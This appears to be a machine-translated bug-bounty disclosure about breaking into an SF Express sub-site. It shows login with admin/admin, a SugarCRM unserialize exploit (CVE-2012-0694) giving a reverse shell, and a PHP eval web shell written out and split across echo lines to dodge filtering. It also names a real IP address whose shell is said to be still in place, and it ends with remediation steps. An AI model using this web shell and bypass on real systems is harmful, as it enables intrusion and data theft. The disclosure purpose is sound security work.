PHP code execution vulnerability and repair in a sub-station of SF Express

It is actually a collection of vulnerabilities, including PHP code execution and information leakage, which leads to WebShell access.

1. DNS domain transfer Vulnerability
 
 
 
 
2. PHP Code Execution Vulnerability
Threw the sorted IP address into NMAP and found some risky systems.
Address: http: // 219.134.187.130: 8085/index. php? Module = Users & action = Login
Weak passwords admin/admin enter the background.
 
 
 
 
After entering the system, we found that the SugarCRM version was 6.2.3, and we used the latest Exploit (User Authentication required ).
CVE No.: CVE-2012-0694 SugarCRM CE <= 6.3.1 "unserialize ()" PHP Code Execution
 
So we get the reverse shell.
 
 
 
 
There was an episode before getting Webshell, and we found that wget commands were not usable. It seems that the firewall prohibited server external connection. However, the touch command can be used, and the vi command cannot be used. Only echo can be used. Create a 1. php file and write the file by echo.
 
Touch 1.php
Echo "<? Php eval ($ _ POST [cmd])?> "> 1.php
However, after each file is written, $ _ POST will be filtered out, for example.
 
 
 
 
So I thought I could use the XSS method (for more information about gainover, see http://www.wooyun.org/bugs/wooyun-2012-07854,haha,
So the first line
 
Echo-n "<? Php eval ($ "> 1.php
Row 2
 
Echo-n "_ POST [cmd])?> "> 1.php
 
 
 
 
 
Then, use a kitchen knife to connect and upload the Webshell. Www.2cto.com
 
 
 
 
Webshell address http: // 219.134.187.130: 8085/shell. php
Not deleted yet
 
Database Information
 
 
 
 
After cracking MD5, go to the recruitment website background
 


 
3. Information Leakage, including information about the Oracle database.
Http://uatmobile.sf-express.com/SFMobile.xml
 

Solution:

1. Modify the SugarCRM password.
 
2. Delete the http://uatmobile.w.express.com/sfmobile.xmlfile.
 
3. Delete the Webshell http: // 219.134.187.130: 8085/shell. php
 
4. Stop the service if it is not used, and separate the database from the application.
 
Are there any gifts? Haha, it seems that SF does not charge express delivery for gifts.